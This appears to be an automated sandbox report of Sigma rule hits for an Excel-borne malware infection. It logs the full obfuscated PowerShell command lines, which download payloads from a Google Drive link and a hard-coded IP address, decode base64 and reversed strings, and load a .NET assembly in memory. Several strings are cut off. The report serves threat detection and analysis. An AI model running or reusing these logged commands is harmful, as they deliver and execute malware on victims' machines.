Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0n

Sigma detected: File With Uncommon Extension Created By An Office Application

Source: File created

Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3596, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicegirlwithnewthingswhichevennobodknowthatkissingme[1].hta

Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation

Source: Process started

Author: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdes

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdes

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdes

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4008, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS" , ProcessId: 3028, ProcessName: wscript.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))", CommandLine: "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiA

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3596, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3868, ProcessName: mshta.exe

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRi